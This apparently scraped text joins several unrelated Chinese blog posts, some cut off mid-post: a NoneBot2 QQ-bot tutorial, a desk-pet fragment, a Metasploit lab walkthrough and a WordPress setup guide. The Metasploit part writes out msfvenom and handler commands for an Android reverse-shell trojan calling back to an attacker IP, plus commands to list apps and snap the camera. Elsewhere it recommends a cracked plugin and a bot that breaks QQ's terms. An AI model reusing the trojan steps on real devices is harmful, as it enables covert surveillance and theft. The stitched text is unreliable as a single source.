一、前言

        主播主播，有没有既简单又方便的QQ机器人框架啊？有的兄弟，有的。NoneBot2 是一个现代、跨平台、可扩展的 Python 聊天机器人框架，它基于 Python 的类型注解和异步特性，能够为你的需求提供便捷灵活的支持，在开发聊天机器人方面具有诸多优势和特点。
        在一周之前我也是一个刚入坑的小白，文档看不很懂，各个平台的教程都比较旧了，寻找信息方面费了好大功夫。所以我想站在小白的角度，出一份保姆级教程，为了方便理解，而不是直接生搬硬套，我会对一些专业术语进行简洁的解释，安利一波！（当然，在不久的将来，这个教程可能也会落后，哈哈）

官方QQ群：768887710
官方文档：https://nonebot.dev
GitHub项目地址（可能需要魔法）：https://github.com/nonebot

二、QQ机器人搭建教程

        注意：在搭建QQ机器人之前必须先安装好Python，也就是必须在Python环境下才可以搭建，并且Python的版本必须>=3.9。

（一）更新pip

       先更新一下pip，预防后面出现问题。win+R输入cmd进入命令提示符，输入以下命令，成功后别关闭，继续进行（二）：

python -m pip install --upgrade pip

（二）安装pipx

        pipx是一个用于在隔离环境中安装和运行 Python 应用程序的工具，它旨在解决在系统范围内安装 Python 包可能导致的依赖冲突和环境混乱问题。
        继续在cmd中，依次输入以下两条命令，一条一条输入哈，成功后关闭命令提示符（这里要关一下，再重新打开输入“（三）”中的指令）：

python -m pip install --user pipx
python -m pipx ensurepath

（三）安装脚手架nb-cli

        脚手架原本是建筑工程中为了保证施工人员安全和方便施工而搭建的临时设施，在软件开发中，它是一种可以为开发者提供项目基础结构和基本功能的工具或框架，能够帮助开发者快速搭建项目的初始架构。
        重新打开命令提示符，接着输入以下命令，成功之后关闭命令提示符：

pipx install nb-cli

（四）创建项目

       前两步已经把环境搭建好了，现在开始创建一个自己的机器人项目。随便在一个位置新建一个文件夹，任意一个盘或者桌面 都行（这里我创建了一个NoneBot2文件夹），进入文件夹，然后在此路径下输入cmd然后回车进入命令提示符输入以下指令：

nb

然后就会呈现出如下图的界面，会让你进行一系列的选择来配置机器人，然后按照我下面描述的步骤进行操作：

1、你想要进行什么操作？

       选择创建一个 NoneBot 项目。

2、选择一个要使用的模板：

       选择simple（插件开发者）。（这里很多教程都会让新手选bootstrap，确实方便简洁，但都是新手了，肯定是啥都不懂，再简洁也看不懂。因为很多大佬他们选择的都是bootstrap，这个可以自己开发插件，而simple是只能安装官方插件商店的。大佬们往往不太了解simple，所以为了方便问大佬问题，推荐用simple，下面我也会简洁介绍一下simple的结构）

3、项目名称：

       也就是你机器人的文件名，过一会会生成一个你输入项目名称的文件夹，里面就是构成机器人的文件。（这里只能输入英文，我输入的是George）

4、要使用哪些适配器？

       选择 OneBot V11（OneBot V11 协议）。（注意：这里不能直接回车选择，直接回车的话就是空选，要先把前面那个圆点点了，如果不小心直接回车空选了也没事，后面会提示让你确认一下。适配器和下面的驱动器都可以多选，不同的插件对适配器和驱动器要求不同，如果你以后安装的插件需要其他的适配器和驱动器，需要再安装，这也就是可以多选的原因，但我们刚创建，只选这一个常用的就行）

5、要使用哪些驱动器？

       也就选一个常用的默认的FastAPI （FastAPI 驱动器），这里圆点本来就是饱满的，所以就直接回车就行。

6、请输入插件存储位置：

       选择在“src”文件夹中，也就是以后你自己开发的插件要放在这，只有放在这里，插件才能运行。不过这里只放自己开发的，在官方插件商店里下载的插件可不在这，下面会讲。选择存在src中，是为了清晰分明，避免与其他文件混淆。

7、立即安装依赖？

       输入Y。在 NoneBot2 中，依赖是一种用于处理事件处理函数的前置条件和数据准备的机制。通过使用依赖，Nonebot2 可以更方便地管理事件处理函数的前置条件和数据准备，提高代码的可维护性和可扩展性，同时也可以使代码结构更加清晰，将不同的功能模块分离，降低代码的耦合度。

8、创建虚拟环境？

       输入Y。Nonebot2 机器人项目通常会使用大量的第三方库和插件，这些库和插件可能对特定 Python 包的版本有不同的要求。例如，一个插件可能需要 numpy 的 1.18 版本，而另一个插件可能需要 numpy 的 1.20 版本。如果将它们安装在系统的全局 Python 环境中，就会产生冲突，导致某些插件无法正常工作。通过创建虚拟环境，可以为每个 Nonebot2 项目创建独立的依赖环境，在不同的虚拟环境中安装不同版本的 numpy，使得各个项目的依赖能够互不干扰，确保每个插件和整个 Nonebot2 项目都能正常运行。也就是说在虚拟环境中下载的库只在这个环境中，环境一删，里面下的所有东西都没了，不会影响其他地方的程序。

9、选择内置插件

       就选择一个echo插件就行，这是个复读机插件，会复读一下你发的信息。内置插件是为了方便我们对机器人进行测试，看它是否在正常运行，等会安装好机器人要用它测试一下。（这里和适配器一样，要先使前面圆点饱满再回车，才算是选上）

出现上面界面就说明创建成功，关闭命令操作符即可。

三、使用Lagrange协议端登录QQ

        机器人程序配置好了，那么怎么将你的QQ号登录到机器人上，进行绑定呢？用Lagrange，安装配置Lagrange的方法看这个博主的教程，讲的挺好的：https://blog.csdn.net/m0_66648798/article/details/141038846

四、运行机器人

        用Lagrange登上自己的QQ后，进入你机器人项目的文件夹，输入cmd进入命令提示符，输入nb run等一会儿就能运行了（注意：Lagrange和机器人运行窗口均不能关闭）
运行之后，可以利用安装的内置插件echo进行测试，看机器人运行是否正常。echo插件在私聊中触发的默认文字格式是/echo 文本，而在群聊中的默认格式是/echo 文本@机器人。如下图：

私聊：

群聊：

五、补充（主要是某些文件夹的作用）

注意：我一开始创建的文件夹在C盘，命名为NoneBot2，项目名称叫George，我下面提到的路径请依照自己前面所填写的内容一一对应
1、以后自己开发的插件存放位置：C:\NoneBot2\George\src
2、在插件商店安装的插件所处位置C:\NoneBot2\George\.venv\Lib\site-packages（插件的文件名一般都是
以nonebot_plugin_开头）

六、结语

        以后会出服务器部署和安装官方插件商店中的插件的教程。然后请大家谨慎娱乐QQ机器人，此行为违反了《QQ 软件许可及服务协议》，腾讯检测到会封号，所以建议用小号运行机器人。不过这完全看脸，有的人玩了几年都不封，有的人刚装上第二天就被封了一次，比如我：

前言

        STM32单片机桌宠，人生首焊，也是成功复刻，好兄弟不相信我，直接拿你命名哈哈哈哈哈哈，就是电池买小了，不充满电带不动，只有满电或者充着电，才能正确执行指令。我总共弄了20个功能，感谢up主的开源

原创up主CSDN主页：Sngels_wyh
原创up主抖音主页：Sngels_wyh
原创up主B站主页：Sngels_wyh

成果展示

额，由于煮啵付不起高额的CDN费用，所以视频请前往这里看：传送门

一、前言

        刚进行过黑客渗透的 George 激情澎湃，决定写一篇博客记录一下，谨以纪念！MSF，全称为Metasploit Framework，是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中，其显示的内网IP无法被外网的安卓手机S直接访问，所以不能直接将文章方法应用于外网。该实验为模拟环境，未经授权的渗透都是违法行为，我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统，入侵渗透更高级的系统需要更加专业的知识，再加上只能进行内网渗透，所以这种方法很难进行违法渗透！

借鉴于这两篇文章：文章一 和 文章二

二、演示环境

        攻击主机：虚拟机 kali IP:192.168.147.129
        靶机：联想模拟器 安卓9

三、渗透过程

（一）查询虚拟机中kali的IP

        George先在终端中输入ifconfig查询了自己虚拟机中kali的ip地址，如下图，可知ip为192.168.147.129

（二）使用root权限

        George先在终端输入su root，输入自己的密码，使用root权限，然后在此权限下进行以下操作。

（三）生成木马

        这个木马是放在靶机上的，目的是与攻击主机进行连接，使攻击主机控制靶机，为了隐蔽，我们可以把木马与软件或网站链接捆绑在一起，神不知鬼不觉地使木马在靶机上运行起来，这也就是为什么尽量不要在第三方网站下载破解软件，不要随便点击不明网站的原因。这里George为了追求方便，就直接裸木马
        输入msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.147.129 LPORT=6666 R >木马.apk（这里的 LHOST换成自己kali的ip，LPORT换成一个没被占用的端口，后面的木马安装包apk的名称自定义）生成的安装包apk会默认生成在桌面的主文件夹中，并把此木马放在靶机上（在靶机上安装后软件名默认为MainActivity），先不要运行，如下图：

        

（四）打开MSF

George继续在终端输入msfconsole打开SF`（这里打开之后显示的图案是随机的）

（五）配置攻击载荷

George接着在终端中输入以下命令进行配置（一条一条输入）

use exploit/multi/handler  //选择模块
set payload android/meterpreter/reverse_tcp   //选择攻击模块
set LHOST 192.168.147.129    //与你自己kali的IP保持一致
set LPORT 6666   //与你之前设置的端口保持一致

（六）运行

配置完之后George输入run运行，然后双击靶机上的木马，使它在靶机上运行，出现类似如下图，则代表渗透成功：

（七）控制靶机的指令（示例，更多详见开头指的两篇教程文章）

1、查看对方手机系统信息

命令：sysinfo

2、查看对方手机安装哪些app文件

命令：app_list

3、控制摄像头拍摄一张照片

注意：要先给虚拟机摄像头权限，安装上相机，有前置摄像头开关的电脑要打开它
命令：webcam_snap（也是成功拍到了我的键盘）

前言

      说实话，自己从0开始建站，一个人研究走了不少弯路，浪费了不少时间，所以第一篇博客我决定写一篇建站流程，并附上我在此期间看的教程，希望能帮助到像我这样第一次建站而无从下手的小白，可能是因为淋过雨，所以想给别人撑把伞吧，哈哈哈。建站的方法有很多，我讲的是我这个网站搭建的流程。本文只作一个指导，讲述一下流程和煮啵建站过程中看的一些教程。有的过程可能不太详细，有疑问的朋友可以发在下面的评论里，煮啵会尽量及时帮你们解决问题并将其更新到最后的“问题”一栏中。煮啵主教程看的是这个主教程，但由于煮啵用的是主机但教程里的是服务器，所以我只参考了其中一部分。

本站的配置

• 虚拟主机：星辰云
• 域名：腾讯云
• 图床：PicGo+七牛云
• 主机的SSL证书：腾讯云
• 图床的SSL证书：腾讯云
• 主题模版：Argon
• 网站框架：WordPress

建站流程

1、购买域名、服务器/虚拟主机

      首先需要先买一个属于自己的域名和服务器/虚拟主机。如果买的是国内服务器/虚拟主机的话，域名和机子都要备案，如果是国外的话，域名和服务器都不用备案。我也是建完站之后才知道域名也不用备案的，我用的是国外的机子但还是备案了域名。不过没事，如果我以后用国内机子的话就不用再备案了。所以大多数人了方便都选择国外的机子。

      买的时候需要注意一下服务器/虚拟主机的PHP版本和数据库版本，wordpress至少需要PHP7.4、数据库MySQL5.7版本，一般都是符合要求的，没有版本特别低的机子。

      虚拟主机相对来说不稳定，可以去了解一下虚拟主机的原理。虚拟主机为共享产品，出现攻击等情况，如有更高需求可订购云服务器。像我这个网站前一段时间就时不时登不进去，不稳定，可能就是某共享产品被攻击了，被dd或者cc了。

2、备案域名和服务器/虚拟主机（如果是国内的话）

      在一个平台买域名可以在另一个平台备案，不过在某个平台备案域名就必须用本平台的机子，如果被检测到会下架你的网站，不过也是概率性事件，如果要用其他平台的机子，需要进行接入备案操作。（我这边在腾讯云备案的域名，但是用的是香港的机子，为了满足这个条件，我就又搞了一个指向腾讯云对象储存COS的解析，就只挂一个解析，不用对腾讯那边发出任何请求，我问过客服了，说这样是可以的）

      个人备案的话很简单，商业备案麻烦，我这是个人备案的，个人备案只需要准备自己的身份证就好。不过备案的时候要去淘宝去买一个网站域名备案授权码，别提前买，需要现场刷新的，很便宜，我记得当时花了6块多。

      总共大概是需要7-20天，大概流程是，我当时是6月27日备的案，第二天就收到了腾讯云北京ip的电话核实信息提供一下身份证后四位之类的。说我有些内容不合规，让我改一些内容。我是在备案的时候对网站的描述太片面了，需要改的具体一点。但是是我口头跟他说，然后他在那边帮我改并提交，不用自己再进行操作了。然后会收到一个短信，进链接验证一下，你的信息就被提交到管局进行最后一步的审核。管局是没有给煮啵打电话核实信息的，也不知道是不是抽查核实，煮啵在7月15日成功收到了管局的备案成功的信息。

      服务器/虚拟主机的话，煮啵没有备案过，没有经验，所以就不发言了......请自行搜索

3、解析域名到服务器/虚拟主机

      这个部分的教程很乱，当时煮啵也没找到非常好的教程，服务器需要解析ip，但虚拟主机可能就只需解析商家提供的CNAME，自行搜索吧。

4、准备wordpress官方文件和主题文件

      直接下载某些博主整理好的压缩包文件（主教程里的博主就有），下载并导入到网页文件夹中（如果是服务器就在宝塔面板里操作，如果是虚拟主机就在主机商提供的控制面板中操作）

5、登录wordpress

      看主教程。由于煮啵用的是虚拟主机，所以登录的时候要输入域名而不是虚拟主机ip。

6、图床的设置

      这里需要注意的事项写在下面了，下面的教程都没提到，煮啵当时是自己慢慢摸索的，错了一步图片就可能加载不出来。

教程：PicGo+七牛云

（1）3分30时，加速域名其实填的是子域名，就随便填个前缀，tuchuang或者cdn，如果不理解的话建议与教程保持一致。后面的操作其实就是激活子域名并绑定到七牛云图床上。
（2）6分30时，这里的网址一定要写https，这个前缀其实就是后面生成图片链接的前缀，教程里填的是http，这样会导致你后面设置SSL证书之后还要手动改图片的前缀为https，因为SSL证书就是用来加载https的。
（3）7分05时，这里的网址后缀一定要打一个空格，如果不输入空格，图片默认URL网址后缀会默认为undefine，会导致图片加载不出来

7、配置SSL证书

      其实就是配置安全锁，让网址左边的“不安全”消失。这里煮啵建站的时候，操作顺序弄反了，由于煮啵当时第一次建站没经验，先进行的下面的部分美化，如背景图。然后发现网站显示不安全才想起来配置SSL证书，这导致配置SSL证书时需要多进行额外操作，要自己手动将所有http图片换成https，这也就就是上面进行图床设置的时候为什么强调要写https。借鉴了煮啵的经验，所以就建议先配置SSL证书。注意下载的证书的类型一定要与你购买的服务器/虚拟主机相匹配，如果不确定，请询问您所购买的云服务商家。

      注意：图床也要配置SSL证书，因为你图床也相当于用了七牛云免费的服务器和你自己的子域名（煮啵当时仅仅给这个网站配置了SSL证书后发现还是没有安全锁，研究了一天，才意识到问题在这）

8、Argon主题的美化

不再赘述，主题美化教程请看主教程和下面这几个。
视频教程1
视频教程2
文章教程1（具体的文章）
文章教程2（具体的文章）
文章教程3（建站分享的分类）
文章教程4（建站分享的分类）

9、插件

WordPress有很多有用的插件，下面这几个是煮啵目前在用的

（1）备份插件1

可以分开备份网站中的每一项，还原的时候也可以只还原其中的某一项，有定时备份功能，像我就是定时每天备份到谷歌云盘中，直接在插件商店里搜UpdraftPlus就能搜到。

（2）备份插件2

上面那个备份插件适合平日的定时备份，而这个是一站式备份与迁移的插件，将网站的所有数据和文件打包成一个文件，没有定时备份功能，更适用于网站的迁移。这是一个破解版的，所以官方搜不到这个插件，在这个教程里：备份插件教程

（3）统计插件

可以看到本网站左侧的站点概览中有个网页统计用的就是这个插件WP Statistics，直接在插件中心搜就行。

（4）MarkDown插件

wordpress的编辑器不支持markdown格式，有个超级好用的，但官方也是搜不到，只能去GitHub下载,地址：Githuber MD

（5）邮箱通知插件

Argon主题是自带邮箱通知功能的，但还需要一个“中介”，需要配置一个邮件传输协议，在插件商店里搜Configure SMTP，在这个插件里配置好之后，别人给你评论或者回复你，就能发送邮箱通知你或者留言的人。

（6）AI摘要插件

就是我每篇文章最前面的AI摘要功能，这个是另一个博主成烁自己写的插件，具体教程可去他的文章去看：传送门

（7）优化网站的插件

WP-Optimize是一款“一站式”的WordPress优化工具尤其擅长数据库清理和基础性能优化，适合希望通过简单操作提升网站速度的用户。使用时注意合理配置清理规则和缓存策略，可在不影响网站功能的前提下，有效改善加载性能。这个直接在插件中心就能搜到，可以使用它的缓存功能，加快网站和图片的加载，不过这个功能与上面的统计插件有冲突，需要特殊配置一下。煮啵经常使用这个插件清理文章修订记录、草稿文章、回收站等，挺好用的。

10、问题

另外wordpress中还有一些我碰见的问题和评论区的问题，总结到这，不知道能不能帮助到大家。

（1）有些网页会404

问题出现在链接上，如果你网页的别名没有改，就是默认别名为中文，而网址中默认会出现别名的。网址中不能出现中文，需要将每个别名都更改一下，如果感觉每个网页都改别名嫌麻烦，就换一下固定链接格式，别让别名出现在网址里。

研究了好久，终于搭建了自己第一个博客网站，哈哈哈哈哈，好开心ヾ (≧∇≦) ゝ